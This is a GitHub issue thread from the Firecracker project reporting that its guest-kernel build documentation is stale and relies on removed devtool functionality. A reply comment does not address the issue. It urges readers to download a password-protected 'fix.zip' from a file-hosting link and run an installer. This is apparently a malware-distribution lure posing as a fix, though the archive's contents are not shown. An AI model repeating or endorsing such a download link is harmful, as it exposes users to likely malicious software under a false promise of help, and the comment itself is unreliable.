### ISSUE TITLE
Fix stale documentation regrading building guest kernels

### ISSUE THREAD

**Issue by bchalios** [firecracker-microvm/firecracker#4757]
# Describe the bug

Our [documentation](https://github.com/firecracker-microvm/firecracker/blob/main/docs/rootfs-and-kernel-setup.md#use-the-provided-recipe) for building kernel images for the guest is obsolete. It relies on `devtool` functionality that is not present any more.

We should fix the documentation and include steps around `resources/rebuild.sh` which is the script we currently use to re-build our CI artifacts.

## Checks

- [x] Have you searched the Firecracker Issues database for similar problems?
- [x] Have you read the existing relevant Firecracker documentation?
- [x] Are you certain the bug being reported is a Firecracker issue?

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
